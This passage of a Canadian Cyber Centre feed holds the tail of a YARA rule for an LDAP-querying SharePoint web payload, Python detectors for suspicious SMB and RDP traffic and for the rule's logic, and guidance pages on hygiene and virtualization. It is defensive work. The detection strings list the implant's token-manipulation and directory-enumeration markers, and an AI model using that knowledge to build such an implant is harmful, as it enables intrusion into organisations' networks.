        // LDAP related strings.
        $e1 = "LDAP://" wide
        $e2 = "samaccountname=" wide nocase
        $e3 = "cn=" wide nocase
        $e4 = "msexchrecipienttypedetails=" wide
        $e5 = "userprincipalname=" wide
        $e6 = "mail=" wide

    condition:
        uint16(0) == 0x5A4D and
        (
            (5 of ($a*) and 4 of ($d*)) or
            all of ($x*)
        ) and
        $b1 and
        4 of ($c*) and
        2 of ($e*) and
        filesize &lt; 2MB
}
</pre> </details></div> </section></section><div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <!-- Acknowledgments --> <section><h2 class="text-info" id="acknowledgements">Acknowledgments</h2> <p>As a part of the Communications Security Establishment Canada (CSE), the Cyber Centre is a proud member of the Five Eyes, the world’s longest-standing and closest intelligence-sharing alliance. Sharing IoCs and <abbr title="tactics, techniques and procedures">TTPs</abbr> with the cyber community and Five Eyes partners has been instrumental since the SharePoint vulnerabilities were first discovered, and ongoing analytical exchanges have maximized the value of collected data.</p> <p>Further collaboration with organizations such as the Microsoft Threat Intelligence Center (MSTIC) and Palo Alto’s Unit42 has enabled the exchange of detailed malware analysis and technical findings, strengthening collective defences.</p> </section><section class="alert alert-info"><p><strong>Disclaimer:</strong> The Cyber Centre disclaims all liability for any loss, damage, or costs arising from the use of or reliance on the information within this article. 
Readers are solely responsible for verifying the accuracy and applicability of any information before acting on it.</p> </section><div class="clearfix"> </div> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> </div> </div> </div> </div> </div> </article>
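<p>The detection opportunity described under Observed tactic 7 (SMB over port 445 initiated by the IIS worker process instead of the Windows kernel, and onward RDP attempts from already compromised servers) can be expressed as a process-attributed filter over network-connection telemetry. The script below is an added example written for this page; it is not code from the Cyber Centre or its repositories. Its assumptions: records in the shape of Sysmon Event ID 3 (NetworkConnect) with <code>Computer</code>, <code>Image</code>, <code>ProcessId</code>, <code>DestinationIp</code>, <code>DestinationPort</code> and <code>Initiated</code> fields; that kernel-originated SMB client traffic is attributed to <code>Image=System</code> (PID 4); that <code>w3wp.exe</code> is the IIS worker process; a constructed server inventory; and a pipe-delimited export format. All sample events are constructed.</p>

```python
from dataclasses import dataclass

# Assumptions of this example: the IIS worker process image is w3wp.exe, and
# Sysmon attributes kernel-originated SMB client traffic to Image=System (PID 4).
IIS_WORKER = "w3wp.exe"
KERNEL_IMAGE = "system"

# Constructed server inventory: hosts that should never initiate RDP sessions.
SERVER_HOSTS = {"sp-web01", "iis-ext01"}

# Constructed Sysmon Event ID 3 style records (pipe-delimited key=value is an
# assumed export format). Field names follow Sysmon's NetworkConnect event.
SAMPLE_EVENTS = [
    "Computer=sp-web01|Image=System|ProcessId=4|DestinationIp=10.0.0.12|DestinationPort=445|Initiated=true",
    "Computer=sp-web01|Image=C:\\Windows\\System32\\inetsrv\\w3wp.exe|ProcessId=5120|DestinationIp=10.0.0.25|DestinationPort=445|Initiated=true",
    "Computer=sp-web01|Image=C:\\Windows\\System32\\inetsrv\\w3wp.exe|ProcessId=5120|DestinationIp=203.0.113.9|DestinationPort=443|Initiated=true",
    "Computer=sp-web01|Image=C:\\Windows\\System32\\mstsc.exe|ProcessId=900|DestinationIp=10.0.0.40|DestinationPort=3389|Initiated=true",
    "Computer=ws-042|Image=C:\\Windows\\System32\\mstsc.exe|ProcessId=2222|DestinationIp=10.0.0.41|DestinationPort=3389|Initiated=true",
    "Computer=sp-web01|Image=C:\\Windows\\System32\\inetsrv\\w3wp.exe|ProcessId=5120|DestinationIp=10.0.0.25|DestinationPort=445|Initiated=false",
]


@dataclass(frozen=True)
class Finding:
    computer: str
    image: str
    pid: int
    dest: str
    port: int
    reason: str


def parse_event(line: str) -> dict:
    """Split one 'key=value|key=value' record into a dict."""
    return dict(field.split("=", 1) for field in line.split("|"))


def image_name(path: str) -> str:
    """Lower-cased file name of the process image, whatever the path separator."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(events, server_hosts=SERVER_HOSTS):
    """Findings for outbound SMB from a user-mode process and outbound RDP from a server."""
    findings = []
    for line in events:
        ev = parse_event(line)
        if ev.get("Initiated", "").lower() != "true":
            continue  # inbound side of a connection: not what we are hunting
        port = int(ev["DestinationPort"])
        image = image_name(ev["Image"])
        computer = ev["Computer"].lower()
        reason = None
        if port == 445 and image != KERNEL_IMAGE:
            # Normal SMB client traffic is issued by the kernel redirector, not by a process.
            reason = "SMB from IIS worker process" if image == IIS_WORKER else "SMB from user-mode process"
        elif port == 3389 and computer in server_hosts:
            # A server pivoting onward over RDP is the lateral movement pattern observed.
            reason = "outbound RDP from server"
        if reason:
            findings.append(Finding(computer, image, int(ev["ProcessId"]), ev["DestinationIp"], port, reason))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.computer}: {f.image} (pid {f.pid}) -> {f.dest}:{f.port}  [{f.reason}]")
```

<p>Point it at an export of Event ID 3 records instead of <code>SAMPLE_EVENTS</code>. The baseline is that a Windows host's legitimate SMB client traffic is attributed to System, so any other image initiating a 445 connection deserves a look, with <code>w3wp.exe</code> on an Internet-exposed SharePoint or IIS server being the highest-priority case for the activity described in this article.</p>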
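<p>To make the string groups and condition of the win_ldapquery rule in Figure 12 concrete, the following is a pure-Python mirror of that rule, added for this page and not code from the Cyber Centre or its AssemblyLine services. It needs no yara-python: "wide" strings are matched as UTF-16LE and "nocase" ones after ASCII lower-casing, which is how YARA treats those modifiers, and the MZ and filesize checks are reproduced from the condition clause. The buffers it tests are constructed from the rule's own strings rather than real samples, so a match here only demonstrates the logic, not the detection of any file.</p>

```python
# Pure-Python mirror of the win_ldapquery YARA rule (Figure 12). Added example,
# not Cyber Centre code; the sample buffers are constructed, not real malware.

WIDE = "wide"
ASCII = "ascii"

# (pattern, encoding, nocase) triples copied from the rule, grouped by prefix.
RULE_STRINGS = {
    "a": [("LDir", ASCII, False), ("Explore", ASCII, False), ("Internals", ASCII, False),
          ("EncryptAes", ASCII, False), ("DecryptAes", ASCII, False),
          ("Set Token Error", WIDE, False), ("AdsDateValue", ASCII, False),
          ("FindHandle", ASCII, False)],
    "x": [("JavaScriptSerializer", ASCII, False), ("Serialize", ASCII, False),
          ("EncryptAes", ASCII, False), ("DecryptAes", ASCII, False),
          ("DirectorySearcher", ASCII, False)],
    "b": [("0.0.0.0", WIDE, False)],
    "c": [("9068270B-0939-11D1-8BE1-00C04FD8D503", ASCII, False), ("HttpResponse", ASCII, False),
          ("HttpContext", ASCII, False), ("ToBase64String", ASCII, False),
          ("GZipStream", ASCII, False), ("CreateEncryptor", ASCII, False)],
    "d": [("advapi32.dll", ASCII, False), ("ntdll.dll", ASCII, False), ("kernel32.dll", ASCII, False),
          ("NtQuerySystemInformation", ASCII, False), ("OpenProcessToken", ASCII, False),
          ("GetTokenInformation", ASCII, False), ("SetThreadToken", ASCII, False),
          ("GetCurrentThreadToken", ASCII, False), ("Administrator", WIDE, False),
          ("IUSR", WIDE, False)],
    "e": [("LDAP://", WIDE, False), ("samaccountname=", WIDE, True), ("cn=", WIDE, True),
          ("msexchrecipienttypedetails=", WIDE, False), ("userprincipalname=", WIDE, False),
          ("mail=", WIDE, False)],
}


def encode(pattern: str, enc: str) -> bytes:
    """YARA 'wide' means UTF-16LE (each ASCII character followed by a NUL byte)."""
    return pattern.encode("utf-16-le" if enc == WIDE else "ascii")


def count_hits(buf: bytes, group: str) -> int:
    """How many strings of one group occur in the buffer (the 'N of ($g*)' count)."""
    hits = 0
    for pattern, enc, nocase in RULE_STRINGS[group]:
        needle = encode(pattern.lower() if nocase else pattern, enc)
        haystack = buf.lower() if nocase else buf  # bytes.lower() only touches ASCII letters
        hits += int(needle in haystack)
    return hits


def matches_win_ldapquery(buf: bytes) -> bool:
    """Mirror of the rule's condition clause."""
    if buf[:2] != b"MZ":                 # uint16(0) == 0x5A4D, i.e. little-endian "MZ"
        return False
    if len(buf) >= 2 * 1024 * 1024:      # filesize < 2MB
        return False
    latest = count_hits(buf, "a") >= 5 and count_hits(buf, "d") >= 4
    oldest = count_hits(buf, "x") == len(RULE_STRINGS["x"])   # all of ($x*)
    return ((latest or oldest)
            and count_hits(buf, "b") == 1                     # $b1
            and count_hits(buf, "c") >= 4
            and count_hits(buf, "e") >= 2)


def build_sample(groups=("a", "b", "c", "d", "e"), header=b"MZ") -> bytes:
    """Constructed buffer carrying every string of the given groups (not a real file)."""
    body = b"\x00".join(encode(p, enc) for g in groups for p, enc, _ in RULE_STRINGS[g])
    return header + b"\x90" * 62 + body


if __name__ == "__main__":
    print("latest-version strings:", matches_win_ldapquery(build_sample()))
    print("oldest-version strings:", matches_win_ldapquery(build_sample(("x", "b", "c", "e"))))
    print("missing $b1           :", matches_win_ldapquery(build_sample(("a", "c", "d", "e"))))
    print("no MZ header          :", matches_win_ldapquery(build_sample(header=b"\x7fE")))
```

<p>The two branches of the condition correspond to the two generations of the payload the rule covers: the newer class and function names together with the token-manipulation imports, or the full set of older serializer and DirectorySearcher names. Either way the version string, the HTTP-response writing strings and at least two LDAP attribute filters must also be present, which is what keeps the rule from firing on an ordinary .NET assembly that merely references LDAP.</p>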

  • Cyber security hygiene best practices for your organization – ITSAP.10.102
    by Canadian Centre for Cyber Security on September 4, 2025 at 12:56 pm

    <article data-history-node-id="3435" about="/en/guidance/cyber-security-hygiene-best-practices-your-organization-itsap10102" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><div class="row"><!–Info across the top under the image–> <div class="col-md-4 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>September 2025</strong></p> </div> <div class="col-md-4 hidden-xs hidden-sm"> <p class="text-center"><strong>Awareness series</strong></p> </div> <div class="col-md-4 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSAP.10.102</strong></p> </div> <!–MOBILE STARTS HERE–> <div class="hidden-lg hidden-md text-center"> <p><strong>September 2025 | Awareness series</strong></p> </div> </div> <p>Cyber security hygiene refers to the best practices your organization can take to maintain the overall health and security of your <abbr title="information technology">IT</abbr> environment. Your cyber security hygiene helps you better defend your networks, systems and data from threat actors.</p> <p>Threat actors, even in more sophisticated attacks, leverage common vulnerabilities and weaknesses to attack systems and gain initial access. 
By building a solid cyber security foundation, your organization is better positioned to protect, defend and recover from cyber incidents.</p> <h2 class="text-info">On this page</h2> <ul><li><a href="#checklist">Cyber security hygiene checklist</a> <ul><li><a href="#network">Network and endpoint protection</a></li> <li><a href="#system">System protection</a></li> <li><a href="#education">User education and additional protective measures</a></li> </ul></li> </ul><h2 class="text-info" id="checklist">Cyber security hygiene checklist</h2> <p>The following checklist provides actions your organization can take to strengthen your cyber security.</p> <p>While not all actions may be feasible, you should prioritize implementing those that are most impactful and sustainable for your organization. Doing so will enhance your cyber security posture.</p> <h3 id="network">Network and endpoint protection</h3> <ul><li>Protect your network and endpoints with the following tools <ul><li>anti-virus and anti-malware software</li> <li>network protocol inspection tools</li> <li>endpoint detection and response</li> <li>firewalls</li> <li>wireless intrusion detection and prevention systems</li> <li>mobile endpoint threat management solutions and mobile threat defence products</li> </ul></li> <li>Segment your networks to stop traffic from flowing to sensitive or restricted zones</li> <li>Implement a security information and event management system to enable real-time, continuous monitoring to identify anomalies in your <ul><li>network traffic</li> <li>wireless access points</li> <li>mobile device gateways</li> </ul></li> <li>Monitor your security critical components, including the <ul><li>Domain Name System (DNS) server</li> <li>authentication server</li> <li>public key infrastructure</li> </ul></li> <li>Implement protective <abbr title="Domain Name System">DNS</abbr> to prevent users from inadvertently visiting potentially malicious domains on the Internet</li> <li>Regularly renew 
cryptographic keys to maintain secure communications</li> <li>Document secure baseline configurations for all your <abbr title="information technology">IT</abbr>, operational technology components and cloud infrastructure</li> <li>Establish and maintain a configuration management database</li> <li>Conduct and maintain an inventory of your <abbr title="information technology">IT</abbr> assets</li> <li>Manage and detect unauthorized assets by developing and maintaining <abbr title="information technology">IT</abbr> asset management procedures that ensure proper tagging and labelling of hardware and software assets</li> </ul><h4>Read more</h4> <ul><li><a href="/en/guidance/preventative-security-tools-itsap00058">Preventative security tools (ITSAP.00.058)</a></li> <li><a href="/en/guidance/using-security-information-event-management-tools-manage-cyber-security-risks-itsm80024">Using security information and event management tools to manage cyber security risks (ITSM.80.024)</a></li> <li><a href="/en/guidance/network-security-logging-monitoring-itsap80085">Network security logging and monitoring (ITSAP.80.085) </a></li> <li><a href="/en/guidance/domain-name-system-dns-tampering-itsap40021">Domain Name System (DNS) tampering (ITSAP.40.021)</a></li> <li><a href="/en/guidance/protective-domain-name-system-itsap40019">Protective Domain Name System (ITSAP.40.019)</a></li> </ul><div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp" title="Return to Top of page">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <h3 id="system">System protection</h3> <ul><li>Enable automatic updates and patches for your firmware, hardware, software and operating systems, especially for Internet-exposed services and systems</li> <li>Patch operating systems and applications promptly after assessing organizational risk and confirming compatibility with your environment</li> <li>Enforce 
phishing-resistant multi-factor authentication (MFA) for all accounts and systems, especially those with administrative privileges</li> <li>Encourage the use of strong, unique, and confidential passphrases or passwords where <abbr title="multi-factor authentication">MFA</abbr> is not technically feasible</li> <li>Ensure administrators use dedicated workstations that do not allow web browsing or email access</li> <li>Regularly review and update user privileges, such as <ul><li>remove users no longer in your organization</li> <li>edit user privileges if users no longer require access to certain data or systems</li> <li>limit administrative privileges to a small number of users</li> <li>require two-person integrity for administrative privileges</li> <li>conduct administrative functions from a dedicated administrative workstation</li> </ul></li> <li>Apply the principle of least privilege, ensuring users only have the set of privileges that are essential to performing authorized tasks</li> <li>Consider role-based access control</li> <li>Manage mobile devices with unified endpoint management software</li> <li>Implement application allow lists to control what applications and components are allowed on your networks and systems</li> <li>Assess third-party applications to identify and disable unnecessary components or functions or require human intervention before activation (for example, macros)</li> <li>Disable autorun or autoplay on all your operating systems and web browsers to avoid automatic installations of unauthorized software</li> <li>Establish an incident response plan and conduct annual tests to ensure timely restoration of critical functions and effective recovery</li> <li>Categorize your assets to identify those that are most critical to your organization’s operations</li> <li>Regularly backup critical data and systems to offline storage, ensuring backups are isolated from network connections</li> <li>Test your backups periodically to ensure data and systems 
can be recovered quickly and successfully</li> <li>Proactively manage device lifecycles to address vulnerabilities in end-of-life or end-of-service-life devices, which often remain unpatched and increase security risks</li> </ul><h4>Read more </h4> <ul><li><a href="/en/guidance/top-10-it-security-action-items-no2-patch-operating-systems-and-applications-itsm10096">Top 10 <abbr title="information technology">IT</abbr> security action items: No. 2 patch operating systems and applications (ITSM.10.096) </a></li> <li><a href="/en/guidance/secure-your-accounts-and-devices-multi-factor-authentication-itsap30030">Secure your accounts and devices with multi-factor authentication (ITSAP.30.030) </a></li> <li><a href="/en/guidance/top-10-it-security-actions-no3-managing-controlling-administrative-privileges-itsm10094">Top 10 <abbr title="information technology">IT</abbr> security actions: No. 3 managing and controlling administrative privileges (ITSM.10.094)</a></li> <li><a href="/en/guidance/security-considerations-mobile-device-deployments-itsap70002">Security considerations for mobile device deployments (ITSAP.70.002) </a></li> <li><a href="/en/guidance/application-allow-list-itsap10095">Application allow list (ITSAP.10.095) </a></li> <li><a href="/en/guidance/developing-your-incident-response-plan-itsap40003">Developing your incident response plan (ITSAP.40.003) </a></li> <li><a href="/en/guidance/tips-backing-your-information-itsap40002">Tips for backing up your information (ITSAP.40.002) </a></li> </ul><div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp" title="Return to Top of page">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> <h3 id="education">User education and additional protective measures</h3> <ul><li>Provide ongoing, tailored cyber security training to ensure your employees know how to respond to suspicious links or emails</li> <li>Provide 
privacy awareness training to your employees to reduce the risk of privacy breaches</li> <li>Identify and subscribe to relevant security information sources or alert services to stay informed about threats that could impact your organization</li> <li>Develop an internal and external contact list of key stakeholders to alert during cyber threat events</li> </ul><h4>Read more</h4> <ul><li><a href="/en/guidance/offer-tailored-cyber-security-training-your-employees-itsap10093">Offer tailored cyber security training to your employees (ITSAP.10.093)</a></li> <li><a href="/en/guidance/top-measures-enhance-cyber-security-small-and-medium-organizations-itsap10035">Top measures to enhance cyber security for small and medium organizations (ITSAP.10.035) </a></li> <li><a href="/en/guidance/top-10-it-security-actions-protect-internet-connected-networks-and-information-itsm10089">Top 10 <abbr title="information technology">IT</abbr> security actions to protect Internet-connected networks and information (ITSM.10.089) </a></li> <li><a href="/en/cyber-security-readiness/cyber-security-readiness-goals-securing-our-most-critical-systems">Cyber Security Readiness Goals: Securing Our Most Critical Systems</a></li> </ul><div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp" title="Return to Top of page">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <div class="clearfix"> </div> </div> </div> </div> </div> </div> </article>

  • Virtualizing your infrastructure (ITSAP.70.011)
    by Canadian Centre for Cyber Security on September 4, 2025 at 11:54 am

    <article data-history-node-id="682" about="/en/guidance/virtualizing-your-infrastructure-itsap70011" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><div class="row"><!–Info across the top under the image–> <div class="col-md-4 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>September 2025</strong></p> </div> <div class="col-md-4 hidden-xs hidden-sm"> <p class="text-center"><strong>Awareness series</strong></p> </div> <div class="col-md-4 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSAP.70.011</strong></p> </div> <!–MOBILE STARTS HERE–> <div class="hidden-lg hidden-md text-center"> <p><strong>August 2025 | Awareness series</strong></p> </div> <!–pdf download–> <div class="col-md-12"><!–<div class="mrgn-bttm-md well well-sm col-md-4 col-sm-12 pull-right mrgn-lft-md"> <p class="mrgn-tp-sm"><strong>Alternate format</strong>: <a href="/sites/default/files/cyber/publications/itsap70011.pdf">Virtualizing your infrastructure (ITSAP.70.011) (PDF,&nbsp;807&nbsp;KB)</a></p> </div>–> <p>Virtualization is a method of hardware abstraction that allows the creation of software versions of <abbr title="information technology">IT</abbr> systems and services which are traditionally implemented on separate physical hardware. These software versions, or virtual instances, can dramatically increase efficiency and decrease costs. 
Virtualization uses hardware to its full capacity by distributing its capabilities among many different services.</p> <p>Before implementing virtualization within your organization, you should understand the associated risks and ensure you protect your network, systems and information. This guidance covers the basics of virtualization, how your organization can benefit from it and the potential risks involved.</p> <h2 class="text-info">On this page</h2> <ul><li><a href="#virtualization">How virtualization works</a></li> <li><a href="#what-can-virtualization">What virtualization can do for your organization</a></li> <li><a href="#types-of-virtualization">Types of virtualization</a></li> <li><a href="#benefits-of-virtualization">Benefits of virtualization</a></li> <li><a href="#risks-virtualization">Risks of virtualization</a></li> <li><a href="#hypervisor-vendor">What to consider when selecting a hypervisor vendor</a></li> <li><a href="#mitigate-risks-virtualization">How to mitigate the risks of implementing virtual technology</a></li> <li><a href="#learn-more">Learn more</a></li> </ul><h2 class="text-primary text-info" id="virtualization">How virtualization works</h2> <p>To run your systems and services virtually, there are 3 main components.</p> <h3>Virtual machine</h3> <p>With virtualization, you can run your applications on fewer physical servers. Applications and software run virtually on a simulated computer system called a virtual machine (VM). The <abbr title="virtual machine">VM</abbr> has all the features of a computer server, without needing the physical hardware attached. A hypervisor supports the <abbr title="virtual machine">VM</abbr>.</p> <h3>Hypervisor</h3> <p>The hypervisor provides the layer of abstraction between the underlying hardware and hosted virtual machines. An abstraction layer can hide or show as much detail about your system as you want. 
The hypervisor allocates resources, such as central processing unit (CPU) time, storage and memory, to multiple <abbr title="virtual machine">VM</abbr>s. This allows them to run concurrently on the same underlying hardware as though they each had their own dedicated hardware.</p> <p>The use of hypervisor technology may allow for quicker builds and snapshots of <abbr title="virtual machine">VM</abbr> images. The administration of the hypervisor should be done using a dedicated administrator workstation (DAW). <abbr title="dedicated administrator workstation">DAW</abbr>s are limited-use workstations that can only be used by those who have privileged access to perform administrative tasks. They are meant to increase the security of your network.</p> <p>There are 2 types of hypervisors:</p> <ul><li>bare-metal hypervisor (also known as Type 1), which runs directly on physical hardware</li> <li>hosted (also known as Type 2), which runs as an application on a host operating system</li> </ul><p>Hypervisor technologies may also provide additional functionality or features such as the use of <abbr title="virtual machine">VM</abbr> snapshots and backups, virtual networking capabilities between <abbr title="virtual machine">VM</abbr>s, <abbr title="virtual machine">VM</abbr> monitoring and more. Note that the hypervisor itself consumes some of the host’s resources as overhead.</p> <h3>Hardware servers</h3> <p>A single hardware server may support multiple <abbr title="virtual machine">VM</abbr>s. 
Without virtualization, a server’s resources sit unused whenever its applications are idle, for example:</p> <ul><li>processing power</li> <li>RAM</li> <li>storage</li> </ul><p>With virtualization, hardware servers can be used at full capacity to offer the hypervisor all the resources necessary to support the <abbr title="virtual machine">VM</abbr>s.</p> <div class="panel panel-default mrgn-tp-lg"> <div class="panel-body"> <figure><figcaption class="mrgn-bttm-md"><strong>Figure 1: Hardware server supporting a virtual machine</strong></figcaption><img alt="Hardware server supporting a virtual machine" class="img-responsive center-block mrgn-bttm-lg" src="/sites/default/files/images/itsap-70011-virtualizing-your-infrastructure-v2-e.png" /><details class="brdr-tp brdr-rght brdr-bttm brdr-lft mrgn-bttm-sm"><summary>Long description – Figure 1: Hardware server supporting a virtual machine </summary><p>Figure 1 shows how the hardware server supports the hypervisor and the virtual machine. The image shows 3 components from left to right: the hardware server connects to the hypervisor, which in turn connects to the virtual machine(s).</p> </details></figure></div> </div> <h2 class="text-primary text-info" id="what-can-virtualization">What virtualization can do for your organization</h2> <p>Using virtualization, your organization can advance the performance of its infrastructure in the following ways:</p> <ul><li>run multiple operating systems on one physical machine</li> <li>divide system resources between <abbr title="virtual machine">VM</abbr>s, also known as load balancing</li> <li>gain advanced resource controls</li> <li>create virtualized security appliances, such as a firewall</li> <li>easily move, copy and save <abbr title="virtual machine">VM</abbr>s to other files and systems</li> <li>run virtual desktop infrastructure in-office and remotely</li> </ul><h2 class="text-primary text-info" id="types-of-virtualization">Types of virtualization</h2> <p>Virtualization can be used to perform several 
different functions for different needs. Your organization may choose to use all or some of the following types of virtualization.</p> <h3>Server</h3> <p>A physical server is divided up into multiple virtual servers. Each virtual server can run its own operating system. This is effective for deploying <abbr title="information technology">IT</abbr> services within an organization.</p> <h3>Desktop</h3> <p>A workstation is virtualized so that users can access it from anywhere. This includes accessing your organization’s network from a smart device and working remotely. To learn more about workstation virtualization, read our guidance on <a href="https://www.cyber.gc.ca/en/guidance/using-virtual-desktop-home-and-office-itsap70111">using virtual desktop at-home and in-office (ITSAP.70.111)</a>.</p> <h3>Storage</h3> <p>All your physical data storage units are combined to create a large, virtualized unit. This streamlines storage capabilities and creates a central storage console.</p> <h3>Network</h3> <p>A hardware-based network is transformed into a software-based network. This consolidates all the network resources and simplifies administrative control.</p> <h3>Application</h3> <p>Computer programs can run on various operating systems (OS). An application is installed on an underlying <abbr title="Operating System">OS</abbr>, but through virtualization can be accessed and executed on others, such as running a Microsoft application on a Linux <abbr title="Operating System">OS</abbr>. This requires a virtualization layer to be inserted between the <abbr title="Operating System">OS</abbr> and the app.</p> <h3>Cloud computing</h3> <p>While virtualization is closely related to cloud computing, they are not the same concept. However, cloud computing utilizes virtualization to support many of its functions. 
To learn more about cloud computing, read our guidance <a href="https://www.cyber.gc.ca/en/guidance/thinking-moving-cloud-heres-how-do-it-securely">Thinking of moving to the cloud? Here’s how to do it securely</a>.</p> <h2 class="text-primary text-info" id="benefits-of-virtualization">Benefits of virtualization</h2> <p>Virtualization and the use of <abbr title="virtual machine">VM</abbr>s have several benefits. These examples are not inherent capabilities of virtualization but may be achieved depending on how you use it:</p> <ul><li>lowers costs for high performance <abbr title="information technology">IT</abbr> services</li> <li>increases <abbr title="information technology">IT</abbr> productivity, efficiency and responsiveness</li> <li>accelerates the installation of applications and implementations of resources</li> <li>minimizes network downtime</li> <li>decreases disaster recovery time</li> <li>simplifies data centre management</li> <li>segregates applications and data to enhance security and reliability</li> <li>creates environments to safely test applications</li> </ul><h2 class="text-primary text-info" id="risks-virtualization">Risks of virtualization</h2> <p>Your organization can introduce security vulnerabilities if you do not properly configure or secure virtualization technology. 
Risks may include the following:</p> <ul><li>vulnerabilities can be introduced by obsolete and unpatched servers (known as <abbr title="virtual machine">VM</abbr> sprawl)</li> <li>sensitive data can be compromised by moving <abbr title="virtual machine">VM</abbr>s</li> <li>entry points, like external access to the device, can be exploited when a <abbr title="virtual machine">VM</abbr> is offline and dormant</li> <li>hardware can be compromised by malware that spreads from <abbr title="virtual machine">VM</abbr>s or hypervisors, such as <abbr title="virtual machine">VM</abbr> escape</li> <li>unauthorized access may be permitted due to virtual separation not offering the required isolation for security baselines, such as privileged access</li> <li>control and visibility can be lost within the virtual environments or networks if traditional security devices are used</li> <li>resources can be exhausted if a hypervisor is compromised or if unauthorized changes are made to configurations</li> <li>protecting each <abbr title="virtual machine">VM</abbr> is more time consuming because: <ul><li>each <abbr title="virtual machine">VM</abbr> requires unique considerations and configurations</li> <li>each <abbr title="virtual machine">VM</abbr> runs individually from the core structure</li> </ul></li> <li>a denial of service attack that affects one <abbr title="virtual machine">VM</abbr> can affect all connected <abbr title="virtual machine">VM</abbr>s unless it is quickly isolated</li> </ul><h2 class="text-primary text-info" id="hypervisor-vendor">What to consider when selecting a hypervisor vendor</h2> <p>You should choose a hypervisor vendor that can support your organization’s security requirements. 
Before selecting a vendor, consider the following factors to help support your decision:</p> <ul><li>whether the data is encrypted when it is in transit and at rest</li> <li>the security controls that the vendor has in place to protect sensitive data</li> <li>whether the vendor uses bare-metal or hosted hypervisors</li> <li>whether the vendor has monitoring and auditing capabilities</li> <li>who has access to the data on the server</li> <li>how administrative privileges are controlled</li> <li>whether the vendor gives advice and guidance on configuring, deploying, and hardening the virtualized environment</li> </ul><h2 class="text-primary text-info" id="mitigate-risks-virtualization">How to mitigate the risks of implementing virtual technology</h2> <p>Your organization can mitigate some of the risks associated with implementing virtual technology by taking the following 15 actions:</p> <ul><li>Select a trustworthy and reliable vendor</li> <li>Update and patch servers frequently</li> <li>Have your <abbr title="information technology">IT</abbr> team separate the different areas of your virtualized environment (e.g. 
public, storage, management) into network zones for better control</li> <li>Store highly sensitive data on separate physical servers</li> <li>Test high-risk applications in isolated environments</li> <li>Apply the principle of least privilege to ensure users only have enough privilege to carry out their job functions</li> <li>Use separation of duties to break down processes or tasks into a series of steps to reduce the likelihood of mistakes or malicious activity</li> <li>Implement multi-factor authentication for all accounts</li> <li>Train employees on cyber security best practices and provide role-based training</li> <li>Back up your data regularly</li> <li>Use a security information and event management (<abbr title="security information and event management">SIEM</abbr>) approach to business operations to streamline the security of assets</li> <li>Install antivirus and intrusion detection or prevention systems on your infrastructure to keep all <abbr title="virtual machine">VM</abbr>s secure</li> <li>Manage your assets: take stock of all infrastructure being used and regularly audit and remove unused <abbr title="virtual machine">VM</abbr>s</li> <li>Encrypt network traffic and hard drives anywhere sensitive data is stored to protect data in transit and at rest</li> <li>Develop and test an incident response plan</li> </ul><p>We strongly recommend using bare-metal hypervisors where possible for your organization’s virtualized environments. 
Bare-metal hypervisors have fewer layers and typically allow for more efficient use of hardware and additional functionality and capabilities compared to hosted hypervisors.</p> <h2 class="text-primary text-info" id="learn-more">Learn more</h2> <ul><li><a href="https://www.cyber.gc.ca/en/guidance/cyber-centre-data-centre-virtualization-report-best-practices-data-centre-virtualization">Cyber Centre data centre virtualization report: Best practices for data centre virtualization (ITSP.70.010)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/cyber-security-considerations-consumers-managed-services-itsm50030">Cyber security considerations for consumers of managed services (ITSM.50.030)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/isolating-web-facing-applications-itsap10099">Isolating web-facing applications (ITSAP.10.099)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/top-10-it-security-action-items-no2-patch-operating-systems-and-applications-itsm10096">Top 10 IT security actions items: No.2 patch operating systems and applications (ITSM.10.096)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/protect-information-enterprise-level-itsap10097">Protect information at the enterprise level (ITSAP.10.097)</a></li> <li><a href="https://www.cyber.gc.ca/en/guidance/using-encryption-keep-your-sensitive-data-secure-itsap40016">Using encryption to keep your sensitive data secure (ITSAP.40.016)</a></li> </ul></div> </div> </div> </div> </div> </div> </div> </article>
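As an added example that is not part of the Cyber Centre's guidance: a small Python audit over a constructed VM inventory that flags the conditions the risk and mitigation lists above describe (unpatched servers contributing to VM sprawl, dormant VMs that still expose entry points, VMs outside the named network zones, and VMs with no owner to remove or patch them). The inventory records, field names and the patch-age and dormancy thresholds are all assumptions.

```python
"""Audit a VM inventory for the virtualization risks named in ITSAP.70.011.

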